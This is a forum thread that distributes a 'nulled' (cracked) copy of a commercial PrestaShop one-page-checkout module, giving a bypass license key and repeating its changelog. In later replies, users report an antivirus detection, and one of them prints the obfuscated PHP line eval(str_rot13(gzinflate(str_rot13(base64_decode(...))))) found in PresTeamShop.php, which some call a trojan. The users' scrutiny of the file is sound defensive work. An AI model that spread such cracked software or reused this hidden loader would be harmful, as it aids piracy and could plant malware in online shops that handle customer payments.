v1.7-v8x v1.7-v8x One Page Checkout PS (Easy, Fast & Intuitive) 4.3.0 NULLED [08/2024]

Superkiki

Well-known member
Diamond
Elite
XNullUser
Joined
Aug 18, 2023
Messages
88
Reaction score
589
Points
83
Location
Spain
NullCash
3,234
Last version, the best of Page Checkout Prestashop

https://www.presteamshop.com/en/prestashop-modules/one-page-checkout-prestashop.html

Activation nulled
License Key : 12345

v.4.3.0 (08/01/2024)
Checkout 4.0
- It is recommended to upgrade to Checkout 5.0, as this version is no longer maintained.
- Compatibilities:
- slmshipping - v1.0.3 - by Skroutz
Checkout 5.0
- Errors fixed:
- Fixed issues with purchasing virtual products.
- Corrected the issue where the email confirmation was still required during registration even when it was disabled.
- Fixed the issue where the 'dni' field, when disabled, was still required by the country.
- Resolved issues with the integrated Captcha v3 functionality.
- Fixed the issue where custom field values were not being displayed or saved.
- Custom fields no longer show in the native checkout when test mode is active.
- New Features and Improvements:
- [IMPORTANT] Security enhancements.
- Improved user experience in the login and customer registration steps.
- It is now possible to hide the shipping and billing addresses by options or by disabling all fields.
- New option to display the shipping comments box within the payment step.
- New option to control whether the cart is displayed on mobile devices.
- New option to have the guest checkout checkbox selected by default.
- Implemented functionality to display the list of cities using Geonames.
- If the customer has no created addresses, the address form is shown directly.
- Added the functionality to show the zoom on the images of the products in the cart.
- When modifying the cart values, they are now updated in the header cart if it is active.
- Reactivated the 'Confirm' text in the confirm email and password fields.
- Compatibilities:
- Omniva Shipping - v2.0.20 - Mijora
- Venipak Shipping - v1.1.5 - mijora.lt
- slmshipping - v1.0.3 - by Skroutz
- Forced selection of 'stripe_official' via radio button.
- Solved visual issue with popups when using the 'warehouse' template.
- CSS changes to make the 'darique' module compatible.

v.4.2.3 (05/10/2024)
- Errors fixed:
- The display issue for the 'Paypal' module for visitors has been definitively resolved.
Checkout 5.0
- Errors fixed:
- Fixed the issue where the social login popup wouldn't close and refresh the page with the customer logged in.
- Removed the option to set 'stripe_official' as the default payment method due to compatibility issues.
- Fixed the issue where the 'stsitebuilder' module's custom header and footer weren't loading on the checkout page.
- Addressed issues identified with 'Paypal Express Checkout'.
- Resolved the 'Invalid Captcha' issue when login failed.

v.4.2.2 (04/26/2024)
Checkout 4.0
- Errors fixed:
- Fixed: PayPal button was disabled when changing the shipping method with terms and conditions enabled.
- Fixed an issue that prevented editing default PrestaShop fields in radio and select field types.
- Removed the execution of the 'displayExpressCheckout' hook in the cart summary to prevent duplication of PayPal express payment buttons.
- New features and improvements:
- Re-activated the option to select payment methods from any section of the payment process.
- Corrected an error in displaying the total taxes in the cart, based on the billing address.
- Compatibilities:
- mobm - v1.4.7 - MyPresta.eu
- nrtcaptcha - v1.0.4 - AxonVIP
- culqi - v3.0.7 - Culqi
- paypal - v6.3.0 - 202 ecommerce - Fixed the issue of payment display for visitors.
- stsitebuilder v1.2.6 - st themes
Checkout 5.0
- Errors fixed:
- Fixed an error when deleting products with combinations from the cart.
- Fixed: Default options for fields were not being preselected.
- Resolved a lockup when saving with required and disabled fields.
- Compatibility issue with PrestaShop 1.7.2 resolved.
- Improved compatibility with our CustomerTypeOPC module.
- Limited compatibility with klarnapayment to versions 1.3.5 or lower to avoid compatibility conflicts.
- Adjustments made to responsive design between 721px and 991px.
- Resolved issues related to the use of PrestaShop's 'autoupgrade' module.
- Fixed an issue caused by enabling HTML code minification in certain third-party modules.
- Resolved an error that prevented cart recovery with links generated from the BackOffice.
- New features and improvements:
- [IMPORTANT] Implemented Google reCaptcha v3 functionality in registration and login forms of our module, and in PrestaShop's contact form.
- [IMPORTANT] Logins with Google and Facebook are now compatible with the Reskyt app.
- [IMPORTANT] New hook 'displayOpcSocialNetwork' to display social network login buttons anywhere in the store.
 

Attachments

  • v4.3.0-onepagecheckoutps.zip
    19.8 MB · Views: 48

unique

Well-known member
Diamond
Elite
XNullUser
Joined
Dec 12, 2020
Messages
2,137
Reaction score
427
Points
83
NullCash
416
look like a cool plugin ,thank you very much
thanks for good update
 

am123

Member
XNullUser
Joined
Mar 24, 2020
Messages
342
Reaction score
0
Points
16
NullCash
3
Thanks for upload. Lets lest that module.
 

moleco

Well-known member
Diamond
Elite
Joined
Jan 8, 2019
Messages
342
Reaction score
395
Points
63
NullCash
75
Thanks alot nice module nice update it.
 

eduardo1216

Member
XNullUser
Joined
Apr 19, 2021
Messages
54
Reaction score
2
Points
8
NullCash
5
Last version, the best of Page Checkout Prestashop

https://www.presteamshop.com/en/prestashop-modules/one-page-checkout-prestashop.html

Activation nulled
License Key : 12345

v.4.3.0 (08/01/2024)
Checkout 4.0
- It is recommended to upgrade to Checkout 5.0, as this version is no longer maintained.
- Compatibilities:
- slmshipping - v1.0.3 - by Skroutz
Checkout 5.0
- Errors fixed:
- Fixed issues with purchasing virtual products.
- Corrected the issue where the email confirmation was still required during registration even when it was disabled.
- Fixed the issue where the 'dni' field, when disabled, was still required by the country.
- Resolved issues with the integrated Captcha v3 functionality.
- Fixed the issue where custom field values were not being displayed or saved.
- Custom fields no longer show in the native checkout when test mode is active.
- New Features and Improvements:
- [IMPORTANT] Security enhancements.
- Improved user experience in the login and customer registration steps.
- It is now possible to hide the shipping and billing addresses by options or by disabling all fields.
- New option to display the shipping comments box within the payment step.
- New option to control whether the cart is displayed on mobile devices.
- New option to have the guest checkout checkbox selected by default.
- Implemented functionality to display the list of cities using Geonames.
- If the customer has no created addresses, the address form is shown directly.
- Added the functionality to show the zoom on the images of the products in the cart.
- When modifying the cart values, they are now updated in the header cart if it is active.
- Reactivated the 'Confirm' text in the confirm email and password fields.
- Compatibilities:
- Omniva Shipping - v2.0.20 - Mijora
- Venipak Shipping - v1.1.5 - mijora.lt
- slmshipping - v1.0.3 - by Skroutz
- Forced selection of 'stripe_official' via radio button.
- Solved visual issue with popups when using the 'warehouse' template.
- CSS changes to make the 'darique' module compatible.

v.4.2.3 (05/10/2024)
- Errors fixed:
- The display issue for the 'Paypal' module for visitors has been definitively resolved.
Checkout 5.0
- Errors fixed:
- Fixed the issue where the social login popup wouldn't close and refresh the page with the customer logged in.
- Removed the option to set 'stripe_official' as the default payment method due to compatibility issues.
- Fixed the issue where the 'stsitebuilder' module's custom header and footer weren't loading on the checkout page.
- Addressed issues identified with 'Paypal Express Checkout'.
- Resolved the 'Invalid Captcha' issue when login failed.

v.4.2.2 (04/26/2024)
Checkout 4.0
- Errors fixed:
- Fixed: PayPal button was disabled when changing the shipping method with terms and conditions enabled.
- Fixed an issue that prevented editing default PrestaShop fields in radio and select field types.
- Removed the execution of the 'displayExpressCheckout' hook in the cart summary to prevent duplication of PayPal express payment buttons.
- New features and improvements:
- Re-activated the option to select payment methods from any section of the payment process.
- Corrected an error in displaying the total taxes in the cart, based on the billing address.
- Compatibilities:
- mobm - v1.4.7 - MyPresta.eu
- nrtcaptcha - v1.0.4 - AxonVIP
- culqi - v3.0.7 - Culqi
- paypal - v6.3.0 - 202 ecommerce - Fixed the issue of payment display for visitors.
- stsitebuilder v1.2.6 - st themes
Checkout 5.0
- Errors fixed:
- Fixed an error when deleting products with combinations from the cart.
- Fixed: Default options for fields were not being preselected.
- Resolved a lockup when saving with required and disabled fields.
- Compatibility issue with PrestaShop 1.7.2 resolved.
- Improved compatibility with our CustomerTypeOPC module.
- Limited compatibility with klarnapayment to versions 1.3.5 or lower to avoid compatibility conflicts.
- Adjustments made to responsive design between 721px and 991px.
- Resolved issues related to the use of PrestaShop's 'autoupgrade' module.
- Fixed an issue caused by enabling HTML code minification in certain third-party modules.
- Resolved an error that prevented cart recovery with links generated from the BackOffice.
- New features and improvements:
- [IMPORTANT] Implemented Google reCaptcha v3 functionality in registration and login forms of our module, and in PrestaShop's contact form.
- [IMPORTANT] Logins with Google and Facebook are now compatible with the Reskyt app.
- [IMPORTANT] New hook 'displayOpcSocialNetwork' to display social network login buttons anywhere in the store.
una de los mejores plugins para ps
 

Freіserk

Member
XNullUser
Joined
Aug 26, 2022
Messages
65
Reaction score
2
Points
8
NullCash
53
look like a cool plugin ,thank you very much
thanks for good update

One Page Checkout PS (Easy, Fast & Intuitive)

Version 4.3.0 - 7/31/2024​

Major
PrestaShop compatibility: 1.7.0.0 - 8.1.7
  • OPC 4: slmshipping - v1.0.3 - by Skroutz
  • OPC 5: Fixed issues with purchasing virtual products.
  • OPC 5: Corrected the issue where the email confirmation was still required during registration even when it was disabled.
  • OPC 5: Fixed the issue where the "dni" field, when disabled, was still required by the country.
  • OPC 5: Resolved issues with the integrated Captcha v3 functionality.
  • OPC 5: Fixed the issue where custom field values were not being displayed or saved.
  • OPC 5: Custom fields no longer show in the native checkout when test mode is active.
  • OPC 5: [IMPORTANT] Security enhancements.
  • OPC 5: Improved user experience in the login and customer registration steps.
  • OPC 5: It is now possible to hide the shipping and billing addresses by options or by disabling all fields.
  • OPC 5: New option to display the shipping comments box within the payment step.
  • OPC 5: New option to control whether the cart is displayed on mobile devices.
  • OPC 5: New option to have the guest checkout checkbox selected
Post automatically merged:

1723439404022.png

Oh, and what do we have here?
Something does not want to test this module.
 
Last edited:

Superkiki

Well-known member
Diamond
Elite
XNullUser
Joined
Aug 18, 2023
Messages
88
Reaction score
589
Points
83
Location
Spain
NullCash
3,234
look like a cool plugin ,thank you very much
thanks for good update

One Page Checkout PS (Easy, Fast & Intuitive)

Version 4.3.0 - 7/31/2024​

Major
PrestaShop compatibility: 1.7.0.0 - 8.1.7
  • OPC 4: slmshipping - v1.0.3 - by Skroutz
  • OPC 5: Fixed issues with purchasing virtual products.
  • OPC 5: Corrected the issue where the email confirmation was still required during registration even when it was disabled.
  • OPC 5: Fixed the issue where the "dni" field, when disabled, was still required by the country.
  • OPC 5: Resolved issues with the integrated Captcha v3 functionality.
  • OPC 5: Fixed the issue where custom field values were not being displayed or saved.
  • OPC 5: Custom fields no longer show in the native checkout when test mode is active.
  • OPC 5: [IMPORTANT] Security enhancements.
  • OPC 5: Improved user experience in the login and customer registration steps.
  • OPC 5: It is now possible to hide the shipping and billing addresses by options or by disabling all fields.
  • OPC 5: New option to display the shipping comments box within the payment step.
  • OPC 5: New option to control whether the cart is displayed on mobile devices.
  • OPC 5: New option to have the guest checkout checkbox selected
Post automatically merged:

View attachment 128017

Oh, and what do we have here?
Something does not want to test this module.

it's a false detection with security activation from module, i have checked.
Module is secure
 

vivozivo

Well-known member
Master
Diamond
Elite
Joined
Sep 24, 2019
Messages
1,192
Reaction score
582
Points
113
NullCash
53
Beware, try to avoid to download suspicious content. Check twice before you install.
 

alegis

Member
XNullUser
Joined
Nov 18, 2021
Messages
284
Reaction score
0
Points
16
NullCash
3
Thanks for upload. Lets lest that module.
 

hxcode

Well-known member
Master
Diamond
Elite
Joined
Aug 16, 2020
Messages
3,443
Reaction score
389
Points
83
NullCash
26
Thank you for sharing. Let me check.....
 

malaysianen

Member
XNullUser
Joined
May 8, 2024
Messages
43
Reaction score
0
Points
6
Location
US
NullCash
3
more check out step plugin ,i want to which is best and small for me
 

Rockyfeller

Well-known member
Master
Diamond
Elite
Joined
Feb 18, 2019
Messages
364
Reaction score
2,296
Points
93
NullCash
11,699
Suspect! Very suspicious!

Previous versions did not contain this trojan!

I wouldn't download it, much less install it in a store!
 

AquariusGaza

Well-known member
Master
Diamond
Elite
Joined
Sep 29, 2022
Messages
1,246
Reaction score
393
Points
83
NullCash
2,258
I'm going to dowmload and check the source code and i will say
Post automatically merged:

On line 54 of the PresTeamShop.php file there is an eval function.



The statement in PHP is a combination of functions that are designed to decode and execute a text string that has been encoded several times. Let's break down what each part does:



base64_decode: Decodes a string that has been base64 encoded. This converts the base64 encoded string to its original form.

str_rot13: Applies the ROT13 transformation to a string. ROT13 is a Caesar cipher variant where each letter is replaced by the letter 13 positions later in the alphabet. Since ROT13 is a symmetric function, applying str_rot13 twice will return the original text.

gzinflate: Decompresses a compressed string using the ZLIB compression algorithm. The function expects that the string has been previously compressed with gzdeflate or a similar method.

eval: Executes a string as if it were PHP code. Essentially, it evaluates the string and executes any PHP code contained in it.



The PHP statement contains obfuscated code. This means that the original code was hardcoded to prevent it from being easily readable. The ultimate purpose is to run this code once it has been completely decoded and decompressed.



Warning: eval can be very dangerous if run on untrusted code, as it allows any PHP code to be executed, which could include malicious code. Therefore, it is important not to run code with eval unless you are absolutely sure of its origin and content.





I have looked at version 4.2.1 and there is also that code



Is there anyone who wants to have fun decoding it?
Post automatically merged:

The file that tests positive for Virus is the file PresTeamShop.php
Version 4.2.1 does not test positive for viruses, but
If I copied the code that is in version 4.3 in the version 4.2.1 file

eval(str_rot13(gzinflate(str_rot13(base64_decode('LUnHEq3IDf2aqWzeES9DXpEuOXQ2LmUOlwxfP416CqpARVgt9dERWDPef7bhVdZ7rJY/00suH+w/v3JBf8ufb3nr4v7/x9+KJMJSKeu20 DFpZLXXxxe1pHumwx/ivxCngf5PDFJTkkTho4BKmKYdvkC+fFsWn2H2nmIWS5QNyoY46 nZ9ggLtK9rWWVY9DqOuY2O9RpTxzcQl9iuKF9Dqa1eZ17mEr2gllm2JbXDwhUVQZaWHH8 hVt92ve/G1Es7TOOKOPhpkVVf06S9QLc1rI8otZ7a81/WjjMLpsgBKD2u+D17FXNr3AaZe7XZLRUHZTMsKeGrGTu8J3xN5wJfeLDSLpdUWj36LuMsSHLmvpjvuQ2DUoVnhUH16QpcRdP7u jkJHXr/kxzZaON0YaeQF0G9CtnZx8tN0V/HxBy+1SaHdBHWu6lr10zcQo4K96AXtIDy8GDi9guCQ01aHgvUlTtNcxFjKBaXh+CUhuOxXnPPRdy0o3y8Uy9UMuJBcnDWctSUoGJoYca 21he Mpyz S6xAMVa9J0aStH4rEy2PjzVXEweN/AmobTNyXGc44hKiMcF0qkq2VnAmQvL7GsxzkkaSvMOYwN9LKZr3VIxIMIorks+tN0kNrb023sBN3nnhkndp40BCTDVX57zXCREkdZ9/gwEWMoP5To yCQyG9xJXMdKdMzvNYQSgBHBGUzyZs/90urDB7arZsTcnbPoA3s +wjorQ2lj+xvq7D1sWCb8cDlaj/l1qltuJoaXqPTRauEnjzxlxlMn3aegp+YvBf1vLEVwEgJ6YVDMSHA08jMQgjAaLzfJ8lsIk/eoRJeCBWYseKXl07Gtz4E8to70GzBZtnvVFzWttwFIBqh 1BuztEQNeXBnBV8SDgcN+6aPRs9ckwgOgFEo95QZ9sCJXtO0dIkRvJcg4akKaSJzKsux0q NeaUaS3Oh+fqG3DjOFMWBqHRlFREbCv2cZyjXqk2mCnbX5i+kHpZDd6CG4D2EUOu92xJsnB bXTRjY28l8sQKsZMFGfGBbd6if07XZeWX0rZK1aYobdZ9dnmgBU+ZmIvI2uZ1z+y1DntfKMYxa3sfmK0rsGspfh+194vChtDn42kkk9WkqW7VytN69Zraw/RQYN6CRHrRwZPrsDh0V+ OjcAxAsvYLcYIa41QrNru1sADtUVTY4QObfrOIkP7EYoIOog3MvmdR0eGmMTIOqwGlzIIu2z8IKIb9AOMpLGx0C2/PQq476U8jMlbmK23B6A9cH3y8uS4RNU65yGb8cHSJUwoC/CAcBkuoB OHtNDWivwPsL5M0Pk/mRFnHro8IGMWlODGqPRcRYOzDZkpPhKgb96rrwMdq6gMN7A6sj1p9y+CXxpl01byzYVaRXpFF2w842X3nuVCP7AoIMOEbU5qBCj2g3myVJwff25ATyjWvfU/2KQQ anSlMFV+J1zDSSdq9e6i+VS66hNqZcJPD5UuHO+JG61HQBb70oR0TEfTxxJPiA/VGCDY4faY9S YoeybrNIF/3D0bJmfx4cDJQmABC9fiKkWNRJX2qh+XMdWL09t87juYqR92WgetEPYn2OksojFsu VZMqrBT5Akl77KvXHA/6fC63TeKOnKAUGPXcSYVtOxoTXaqTQWkUxpH1 +wTik7lSD1wKS/NfCBnO4y7liywo5o6zQuDrLGnedQ5szTX3EMcZ9ifklH4x5gZ1+bknLaLBYKXNAqjhGCGgc2d7635KbKUH2xrVJo73Ecqjo9wE2B9701yPzRBs7+DcHE2YSp5QDEN5XxOhOIe1 cBMr2jQDTGIf+aHFTNcPWpdI98hZEm0TdeVDCXEFTqhqSfUOmzIHAmbOmX/5Qij5qmhza9gQ68i/n600LBtsd487GFD/XpmfbSxF9HsjeDc/WRPqnGVWvhPFfoNniWxPa1QvdkSAyXkBi0iPs0 0zhhTF4dT7+lObQmaPfJiPjKuQVuPbSdsmC6SdXYp3SelVze+leRx+vim5ad7iyCw0ObioLUlm SIUF5qNP4iGJ1Zb+eiBXoUBYXG64bPDsqb0i943me1UC/lt7iOhbE0x66hfHdGGMtSCUsiadSXJ QfZDRxS3XOmxMBK6SX5JL4BejOQYK6LMb+paSDoqWUrmeOcLFUlxGYiqXukEBsU/M3OJhOOV7XKpOougHuuUYjdcVqY/25l4oXx0IWrg9oy68KUV+azbVJVJGOffGJT3z9H7oltc+dbArvYj +7klo1j1yxbfpiN3+LbodfXtr5LQSrkWGuuOrWqwi18mvQ+Azp2DtUVU9HZSdG03sFmw5JN Y1kK9Bxntu0m1u1zl0mPlnJZiy/v7XIQ3Dvr8SqAZA75De3 /8C17//AQ==')))));

And I send the file again, it does test positive for a virus.
 
Last edited:

hxcode

Well-known member
Master
Diamond
Elite
Joined
Aug 16, 2020
Messages
3,443
Reaction score
389
Points
83
NullCash
26
I'm going to dowmload and check the source code and i will say
Post automatically merged:

On line 54 of the PresTeamShop.php file there is an eval function.



The statement in PHP is a combination of functions that are designed to decode and execute a text string that has been encoded several times. Let's break down what each part does:



base64_decode: Decodes a string that has been base64 encoded. This converts the base64 encoded string to its original form.

str_rot13: Applies the ROT13 transformation to a string. ROT13 is a Caesar cipher variant where each letter is replaced by the letter 13 positions later in the alphabet. Since ROT13 is a symmetric function, applying str_rot13 twice will return the original text.

gzinflate: Decompresses a compressed string using the ZLIB compression algorithm. The function expects that the string has been previously compressed with gzdeflate or a similar method.

eval: Executes a string as if it were PHP code. Essentially, it evaluates the string and executes any PHP code contained in it.



The PHP statement contains obfuscated code. This means that the original code was hardcoded to prevent it from being easily readable. The ultimate purpose is to run this code once it has been completely decoded and decompressed.



Warning: eval can be very dangerous if run on untrusted code, as it allows any PHP code to be executed, which could include malicious code. Therefore, it is important not to run code with eval unless you are absolutely sure of its origin and content.





I have looked at version 4.2.1 and there is also that code



Is there anyone who wants to have fun decoding it?
Post automatically merged:

The file that tests positive for Virus is the file PresTeamShop.php
Version 4.2.1 does not test positive for viruses, but
If I copied the code that is in version 4.3 in the version 4.2.1 file

eval(str_rot13(gzinflate(str_rot13(base64_decode('LUnHEq3IDf2aqWzeES9DXpEuOXQ2LmUOlwxfP416CqpARVgt9dERWDPef7bhVdZ7rJY/00suH+w/v3JBf8ufb3nr4v7/x9+KJMJSKeu20 DFpZLXXxxe1pHumwx/ivxCngf5PDFJTkkTho4BKmKYdvkC+fFsWn2H2nmIWS5QNyoY46 nZ9ggLtK9rWWVY9DqOuY2O9RpTxzcQl9iuKF9Dqa1eZ17mEr2gllm2JbXDwhUVQZaWHH8 hVt92ve/G1Es7TOOKOPhpkVVf06S9QLc1rI8otZ7a81/WjjMLpsgBKD2u+D17FXNr3AaZe7XZLRUHZTMsKeGrGTu8J3xN5wJfeLDSLpdUWj36LuMsSHLmvpjvuQ2DUoVnhUH16QpcRdP7u jkJHXr/kxzZaON0YaeQF0G9CtnZx8tN0V/HxBy+1SaHdBHWu6lr10zcQo4K96AXtIDy8GDi9guCQ01aHgvUlTtNcxFjKBaXh+CUhuOxXnPPRdy0o3y8Uy9UMuJBcnDWctSUoGJoYca 21he Mpyz S6xAMVa9J0aStH4rEy2PjzVXEweN/AmobTNyXGc44hKiMcF0qkq2VnAmQvL7GsxzkkaSvMOYwN9LKZr3VIxIMIorks+tN0kNrb023sBN3nnhkndp40BCTDVX57zXCREkdZ9/gwEWMoP5To yCQyG9xJXMdKdMzvNYQSgBHBGUzyZs/90urDB7arZsTcnbPoA3s +wjorQ2lj+xvq7D1sWCb8cDlaj/l1qltuJoaXqPTRauEnjzxlxlMn3aegp+YvBf1vLEVwEgJ6YVDMSHA08jMQgjAaLzfJ8lsIk/eoRJeCBWYseKXl07Gtz4E8to70GzBZtnvVFzWttwFIBqh 1BuztEQNeXBnBV8SDgcN+6aPRs9ckwgOgFEo95QZ9sCJXtO0dIkRvJcg4akKaSJzKsux0q NeaUaS3Oh+fqG3DjOFMWBqHRlFREbCv2cZyjXqk2mCnbX5i+kHpZDd6CG4D2EUOu92xJsnB bXTRjY28l8sQKsZMFGfGBbd6if07XZeWX0rZK1aYobdZ9dnmgBU+ZmIvI2uZ1z+y1DntfKMYxa3sfmK0rsGspfh+194vChtDn42kkk9WkqW7VytN69Zraw/RQYN6CRHrRwZPrsDh0V+ OjcAxAsvYLcYIa41QrNru1sADtUVTY4QObfrOIkP7EYoIOog3MvmdR0eGmMTIOqwGlzIIu2z8IKIb9AOMpLGx0C2/PQq476U8jMlbmK23B6A9cH3y8uS4RNU65yGb8cHSJUwoC/CAcBkuoB OHtNDWivwPsL5M0Pk/mRFnHro8IGMWlODGqPRcRYOzDZkpPhKgb96rrwMdq6gMN7A6sj1p9y+CXxpl01byzYVaRXpFF2w842X3nuVCP7AoIMOEbU5qBCj2g3myVJwff25ATyjWvfU/2KQQ anSlMFV+J1zDSSdq9e6i+VS66hNqZcJPD5UuHO+JG61HQBb70oR0TEfTxxJPiA/VGCDY4faY9S YoeybrNIF/3D0bJmfx4cDJQmABC9fiKkWNRJX2qh+XMdWL09t87juYqR92WgetEPYn2OksojFsu VZMqrBT5Akl77KvXHA/6fC63TeKOnKAUGPXcSYVtOxoTXaqTQWkUxpH1 +wTik7lSD1wKS/NfCBnO4y7liywo5o6zQuDrLGnedQ5szTX3EMcZ9ifklH4x5gZ1+bknLaLBYKXNAqjhGCGgc2d7635KbKUH2xrVJo73Ecqjo9wE2B9701yPzRBs7+DcHE2YSp5QDEN5XxOhOIe1 cBMr2jQDTGIf+aHFTNcPWpdI98hZEm0TdeVDCXEFTqhqSfUOmzIHAmbOmX/5Qij5qmhza9gQ68i/n600LBtsd487GFD/XpmfbSxF9HsjeDc/WRPqnGVWvhPFfoNniWxPa1QvdkSAyXkBi0iPs0 0zhhTF4dT7+lObQmaPfJiPjKuQVuPbSdsmC6SdXYp3SelVze+leRx+vim5ad7iyCw0ObioLUlm SIUF5qNP4iGJ1Zb+eiBXoUBYXG64bPDsqb0i943me1UC/lt7iOhbE0x66hfHdGGMtSCUsiadSXJ QfZDRxS3XOmxMBK6SX5JL4BejOQYK6LMb+paSDoqWUrmeOcLFUlxGYiqXukEBsU/M3OJhOOV7XKpOougHuuUYjdcVqY/25l4oXx0IWrg9oy68KUV+azbVJVJGOffGJT3z9H7oltc+dbArvYj +7klo1j1yxbfpiN3+LbodfXtr5LQSrkWGuuOrWqwi18mvQ+Azp2DtUVU9HZSdG03sFmw5JN Y1kK9Bxntu0m1u1zl0mPlnJZiy/v7XIQ3Dvr8SqAZA75De3 /8C17//AQ==')))));

And I send the file again, it does test positive for a virus.
This encryption code started to appear in 4.1.8, and I didn't find it in 4.1.7. I'm not sure if this is code inserted by the developer to monitor module installation, or an encryption Trojan inserted by the cracker.
 
Top